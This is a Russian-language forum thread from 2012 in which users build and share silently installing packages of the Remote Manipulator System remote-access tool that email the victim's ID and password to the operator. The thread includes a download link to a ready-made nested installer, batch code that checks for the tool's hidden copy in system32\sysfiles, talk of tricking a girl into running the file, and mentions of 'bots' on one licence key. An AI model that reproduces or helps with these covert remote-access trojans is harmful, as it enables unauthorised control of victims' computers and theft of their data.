RMS 5.1 c отправкой ID и pass на почту.

Тема в разделе "Статьи", создана пользователем крах, 14 сен 2011.

Статус темы:
Закрыта.
  1. nonamed
    nonamed Новичок
    Симпатии:
    0
    25 май 2012
  2. PilotKaa
    PilotKaa Новичок
    Симпатии:
    5
    Значит не зря я их пихал.Просто уже запутался во всех этих файлах,жесть короче если еще ваши скрипты с пропинговкой ставить,наверное вообще с ума сойду)Кстати лицуху менять в инсталшилде кто уже научился?

25 май 2012
  3. nonamed
    nonamed Новичок
    Симпатии:
    0
    PilotKaa
    Что значит менять лицуху в инсталшиелде?
    Кстати, могу выложить настроенный контейнер для rms.exe. В нем уже все файлики для проверки интернета есть, все работает. Только добавляешь через 7-zip свою сборку под именем rms.exe.

Добавлено через 4 минуты
    Вот. Просто добавь через 7-zip свою сборку. Называться должна именно "rms.exe". В принципе, поковыряй батники сам разберешься. Там почти все так же само, как было описано ранее, с немногими доработками (прописаны полные пути к файлам и один скрипт не js а vbs. Не знаю почему но у меня js "повисал" в шедулере при запуске системы. С vbs все норм идет).
    http://zalil.ru/33307185

Последнее редактирование: 25 май 2012
    25 май 2012
  4. PilotKaa
    PilotKaa Новичок
    Симпатии:
    5
    Менять ключ лицензии в сервере.msi не с помощью вьювера,а инсталшилдом.А то я вчера поленился сменить ключ во вьвере и все ID на этом ключе заблокировали,а я как раз хотел девушке в скайпе фокус показать после того как она файлег запустит(
    Конечно выкладывай все будут только благодарны.
    Хотелось бы конечно с кратким рассказом как ты его собрал...

25 май 2012
  5. nonamed
    nonamed Новичок
    Симпатии:
    0
    Выложил в предыдущем посте.
    Собрал так: из тихой сборки RMS удалил все файлы, залил свои (их там разархивировать и подробно рассмотреть все выполняемые команды сможет каждый).
    Получается "матрешка": exe архив, в котором cmd, пара файлов и другой exe архив, в котором снова cmd и msi. Но иначе пока не придумал как еще сделать. И так мозг плохо справляется с этими "сборками сборок из патченых сборок".

25 май 2012
  6. PilotKaa
    PilotKaa Новичок
    Симпатии:
    5
    При добавлении моего rms пишет что Операция не поддерживается для этой папки.

25 май 2012
  7. nonamed
    nonamed Новичок
    Симпатии:
    0
    25 май 2012
  8. nonamed
    nonamed Новичок
    Симпатии:
    0
    PilotKaa,
    можно поподробнее о лицензиях и бане?
    Сейчас заметил, что один ID исчез из онлайна. На том сервере стоял ключ, которая у меня на вьювере в хранилище присутствует. Этот ключ был установлен только на одном ID. Но во вьювере в хранилище еще несколько ключей для других ID.
    В каких случаях вообще банят ID?

25 май 2012
  9. Hendrix
    Hendrix Новичок
    Симпатии:
    0
    Мой вопрос проигнорирован потому, что никто не знает ответ? Или не хочет отвечать? Или данный вопрос уже разбирался? Или я некорректно его задал? Или ещё что? Ответьте, пожалуйста, что делать или хотя бы в какую сторону копать...очень нужно воспользоваться данной софтинкой...или на данную сборку после бана можно не надеяться?

26 май 2012
  10. nonamed
    nonamed Новичок
    Симпатии:
    0
    Hendrix,
    у меня в обычной сборке, ставящейся в sysfiles такой проблемы нет. Если сервер уже установлен, повторный запуск сборки удаляет автоматом старую и сразу ставит новую, при этом генерится новый id.
    Я даже для предотвращения повторной установки добавил код в чекер:

Код:
    if exist c:\windows\system32\sysfiles\rutserv.exe (
    echo "system32 detected RMS"
    goto end)
    if exist c:\windows\syswow64\sysfiles\rutserv.exe (
    echo "syswow64 detected RMS"
    goto end)
    Добавлено через 21 минуту
    А за что вообще можно получить бан на id?

Последнее редактирование: 26 май 2012
    26 май 2012
  11. exe_RU
    exe_RU Новичок
    Симпатии:
    0
    Не открывается c:\windows\system32 на удалённой машине при передаче файлов (другие директории открываются) в чём засада подскажите пожалуйста.

26 май 2012
  12. ELHACK
    ELHACK Новичок
    Симпатии:
    0
    Что то пишет при попытке открыть?

26 май 2012
  13. exe_RU
    exe_RU Новичок
    Симпатии:
    0
    Не удалось открыть директорию

26 май 2012
  14. nonamed
    nonamed Новичок
    Симпатии:
    0
    exe_RU,
    попробуй зайти туда через режим командной строки:
    cd c:\windows\system32

26 май 2012
  15. incode
    incode Banned
    Симпатии:
    16
    За коммерческое использование

26 май 2012
  16. nonamed
    nonamed Новичок
    Симпатии:
    0
    То есть, как я понял, в Viewer может быть только один бесплатный ключ.
    Этот ключ отправляется на сервер с определенным id. Если один ключ отправить на 2 сервера с разными id или в Viewer засунуть больше одного ключа - то будет бан.
    Я правильно понял?

26 май 2012
  17. incode
    incode Banned
    Симпатии:
    16
    Задай этот вопрос "Что можно считать коммерческим использованием?" на официальном форуме.
    Сразу скажу что просто так не банят, это редкость, в основном где используется один и тот же ключ, такие сборки как в первом посту. Когда становится слишком много ботов на одном ключе это расценивается как комерческое использование и ключ банят, почитай на форуме там поднималась эта тема.

26 май 2012
  18. nonamed
    nonamed Новичок
    Симпатии:
    0
    Если использовать Mini internet-id server? Тогда возможность бана исключается или нет? Кто-нибудь пробовал?

26 май 2012
  19. PilotKaa
    PilotKaa Новичок
    Симпатии:
    5
    Читал где то на сайте что они не разглашают какие ограничения имеет бесплатная версия.
    Например вот что я нашел.

26 май 2012
  20. exe_RU
    exe_RU Новичок
    Симпатии:
    0
    спасибо получилось.
    Кстати как корректно удалить rms на удалённой машине

26 май 2012
Статус темы:
Закрыта.
Загрузка...